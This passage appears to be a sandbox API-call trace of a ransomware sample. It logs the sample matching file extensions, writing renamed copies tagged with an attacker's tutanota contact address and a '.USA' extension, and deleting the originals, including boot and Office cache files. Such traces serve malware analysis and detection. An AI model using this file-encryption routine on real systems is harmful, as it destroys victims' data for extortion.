(lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0033.950] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.950] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.950] lstrlenW (lpString=".doc") returned 4 [0033.950] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0033.950] lstrlenW (lpString=".docx") returned 5 [0033.950] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0033.950] lstrlenW (lpString=".pdf") returned 4 [0033.950] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0033.951] lstrlenW (lpString=".xls") returned 4 [0033.951] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0033.951] lstrlenW (lpString=".xlsx") returned 5 [0033.951] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0033.951] lstrlenW (lpString=".ppt") returned 4 [0033.951] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0033.951] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.951] lstrlenW (lpString=".zip") returned 4 [0033.951] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0033.951] lstrlenW (lpString=".rar") returned 4 [0033.951] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0033.951] lstrlenW (lpString=".bz2") returned 4 [0033.951] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0033.951] lstrlenW (lpString=".7z") returned 3 [0033.951] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0033.951] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.951] lstrlenW (lpString=".dbf") returned 4 [0033.951] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0033.951] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.951] lstrlenW (lpString=".1cd") returned 4 [0033.951] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0033.951] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.951] lstrlenW (lpString=".jpg") returned 4 [0033.951] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0033.951] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.951] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.951] lstrlenW (lpString=".doc") returned 4 [0033.951] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0033.951] lstrlenW (lpString=".docx") returned 5 [0033.951] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0033.951] lstrlenW (lpString=".pdf") returned 4 [0033.951] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0033.951] lstrlenW (lpString=".xls") returned 4 [0033.951] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0033.951] lstrlenW (lpString=".xlsx") returned 5 [0033.951] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0033.952] lstrlenW (lpString=".ppt") returned 4 [0033.952] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0033.952] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.952] lstrlenW (lpString=".zip") returned 4 [0033.952] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0033.952] lstrlenW (lpString=".rar") returned 4 [0033.952] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0033.952] lstrlenW (lpString=".bz2") returned 4 [0033.952] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0033.952] lstrlenW (lpString=".7z") returned 3 [0033.952] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0033.952] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.952] lstrlenW (lpString=".dbf") returned 4 [0033.952] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0033.952] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.952] lstrlenW (lpString=".1cd") returned 4 [0033.952] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0033.952] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.952] lstrlenW (lpString=".jpg") returned 4 [0033.952] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0033.952] lstrcmpiW (lpString1=".DAT", lpString2=".USA") returned -1 [0033.952] lstrlenW (lpString="BOOTSTAT.DAT") returned 12 [0033.952] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0033.953] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=65536) returned 1 [0033.953] CloseHandle (hObject=0x168) returned 1 [0033.953] GetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 0x26 [0033.953] GetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\bootstat.dat.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0033.953] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0033.953] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0033.953] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0033.953] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\bootstat.dat.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0033.953] GetLastError () returned 0x0 [0033.953] ReadFile (in: hFile=0x168, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x10000, lpOverlapped=0x0) returned 1 [0033.956] WriteFile (in: hFile=0x16c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x10010, lpOverlapped=0x0) returned 1 [0033.958] ReadFile (in: hFile=0x168, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0033.958] WriteFile (in: hFile=0x16c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0033.958] SetEndOfFile (hFile=0x16c) returned 1 [0033.958] CloseHandle (hObject=0x16c) returned 1 [0033.959] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0033.959] SetEndOfFile (hFile=0x168) returned 1 [0033.960] CloseHandle (hObject=0x168) returned 1 [0033.961] SetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x26) returned 1 [0033.961] DeleteFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 1 [0033.961] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.961] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.961] lstrlenW (lpString=".doc") returned 4 [0033.961] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0033.961] lstrlenW (lpString=".docx") returned 5 [0033.961] lstrcmpiW (lpString1=".docx", lpString2="T.DAT") returned -1 [0033.961] lstrlenW (lpString=".pdf") returned 4 [0033.961] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0033.961] lstrlenW (lpString=".xls") returned 4 [0033.961] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0033.961] lstrlenW (lpString=".xlsx") returned 5 [0033.961] lstrcmpiW (lpString1=".xlsx", lpString2="T.DAT") returned -1 [0033.961] lstrlenW (lpString=".ppt") returned 4 [0033.962] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0033.962] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.962] lstrlenW (lpString=".zip") returned 4 [0033.962] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0033.962] lstrlenW (lpString=".rar") returned 4 [0033.962] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0033.962] lstrlenW (lpString=".bz2") returned 4 [0033.962] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0033.962] lstrlenW (lpString=".7z") returned 3 [0033.962] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0033.962] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.962] lstrlenW (lpString=".dbf") returned 4 [0033.962] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0033.962] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.962] lstrlenW (lpString=".1cd") returned 4 [0033.962] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0033.962] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.962] lstrlenW (lpString=".jpg") returned 4 [0033.962] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0033.962] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.962] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.962] lstrlenW (lpString=".doc") returned 4 [0033.962] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0033.962] lstrlenW (lpString=".docx") returned 5 [0033.962] lstrcmpiW (lpString1=".docx", lpString2="T.DAT") returned -1 [0033.962] lstrlenW (lpString=".pdf") returned 4 [0033.962] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0033.962] lstrlenW (lpString=".xls") returned 4 [0033.962] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0033.962] lstrlenW (lpString=".xlsx") returned 5 [0033.962] lstrcmpiW (lpString1=".xlsx", lpString2="T.DAT") returned -1 [0033.962] lstrlenW (lpString=".ppt") returned 4 [0033.962] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0033.962] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.962] lstrlenW (lpString=".zip") returned 4 [0033.963] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0033.963] lstrlenW (lpString=".rar") returned 4 [0033.963] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0033.963] lstrlenW (lpString=".bz2") returned 4 [0033.963] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0033.963] lstrlenW (lpString=".7z") returned 3 [0033.963] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0033.963] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.963] lstrlenW (lpString=".dbf") returned 4 [0033.963] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0033.963] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.963] lstrlenW (lpString=".1cd") returned 4 [0033.963] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0033.963] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.963] lstrlenW (lpString=".jpg") returned 4 [0033.963] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0033.963] Sleep (dwMilliseconds=0x64) [0034.109] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.109] lstrlenW (lpString="ExcelMUI.xml") returned 12 [0034.109] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0034.181] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1565) returned 1 [0034.181] CloseHandle (hObject=0x15c) returned 1 [0034.182] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml")) returned 0x2020 [0034.182] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.182] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0034.182] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.182] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.182] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0034.335] GetLastError () returned 0x0 [0034.342] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x61d, lpOverlapped=0x0) returned 1 [0034.344] WriteFile (in: hFile=0x164, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x620, lpOverlapped=0x0) returned 1 [0034.345] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.345] WriteFile (in: hFile=0x164, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0034.345] SetEndOfFile (hFile=0x164) returned 1 [0034.345] CloseHandle (hObject=0x164) returned 1 [0034.346] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.346] SetEndOfFile (hFile=0x15c) returned 1 [0034.346] CloseHandle (hObject=0x15c) returned 1 [0034.347] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.347] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml")) returned 1 [0034.347] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.347] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.347] lstrlenW (lpString=".doc") returned 4 [0034.347] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.347] lstrlenW (lpString=".docx") returned 5 [0034.347] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.347] lstrlenW (lpString=".pdf") returned 4 [0034.347] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.347] lstrlenW (lpString=".xls") returned 4 [0034.347] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.347] lstrlenW (lpString=".xlsx") returned 5 [0034.347] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.347] lstrlenW (lpString=".ppt") returned 4 [0034.347] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.347] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.348] lstrlenW (lpString=".zip") returned 4 [0034.348] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.348] lstrlenW (lpString=".rar") returned 4 [0034.348] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.348] lstrlenW (lpString=".bz2") returned 4 [0034.348] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.348] lstrlenW (lpString=".7z") returned 3 [0034.348] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.348] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.348] lstrlenW (lpString=".dbf") returned 4 [0034.348] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.348] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.348] lstrlenW (lpString=".1cd") returned 4 [0034.348] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.348] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.348] lstrlenW (lpString=".jpg") returned 4 [0034.348] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.348] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.348] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.348] lstrlenW (lpString=".doc") returned 4 [0034.348] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.348] lstrlenW (lpString=".docx") returned 5 [0034.348] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.348] lstrlenW (lpString=".pdf") returned 4 [0034.348] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.348] lstrlenW (lpString=".xls") returned 4 [0034.348] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.348] lstrlenW (lpString=".xlsx") returned 5 [0034.348] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.348] lstrlenW (lpString=".ppt") returned 4 [0034.348] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.348] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.348] lstrlenW (lpString=".zip") returned 4 [0034.348] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.349] lstrlenW (lpString=".rar") returned 4 [0034.349] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.349] lstrlenW (lpString=".bz2") returned 4 [0034.349] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.349] lstrlenW (lpString=".7z") returned 3 [0034.349] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.349] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.349] lstrlenW (lpString=".dbf") returned 4 [0034.349] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.349] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.349] lstrlenW (lpString=".1cd") returned 4 [0034.349] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.349] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.349] lstrlenW (lpString=".jpg") returned 4 [0034.349] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.349] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.349] lstrlenW (lpString="Setup.xml") returned 9 [0034.349] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0034.349] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2424) returned 1 [0034.349] CloseHandle (hObject=0x15c) returned 1 [0034.350] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.350] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.350] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0034.350] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.350] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.350] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0034.353] GetLastError () returned 0x0 [0034.353] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x978, lpOverlapped=0x0) returned 1 [0034.355] WriteFile (in: hFile=0x164, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x980, lpOverlapped=0x0) returned 1 [0034.356] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.356] WriteFile (in: hFile=0x164, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.356] SetEndOfFile (hFile=0x164) returned 1 [0034.356] CloseHandle (hObject=0x164) returned 1 [0034.356] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.357] SetEndOfFile (hFile=0x15c) returned 1 [0034.357] CloseHandle (hObject=0x15c) returned 1 [0034.357] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.358] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.358] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.358] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.358] lstrlenW (lpString=".doc") returned 4 [0034.358] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.358] lstrlenW (lpString=".docx") returned 5 [0034.358] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.358] lstrlenW (lpString=".pdf") returned 4 [0034.358] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.358] lstrlenW (lpString=".xls") returned 4 [0034.358] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.358] lstrlenW (lpString=".xlsx") returned 5 [0034.358] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.358] lstrlenW (lpString=".ppt") returned 4 [0034.358] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.358] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.358] lstrlenW (lpString=".zip") returned 4 [0034.358] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.358] lstrlenW (lpString=".rar") returned 4 [0034.358] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.358] lstrlenW (lpString=".bz2") returned 4 [0034.358] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.358] lstrlenW 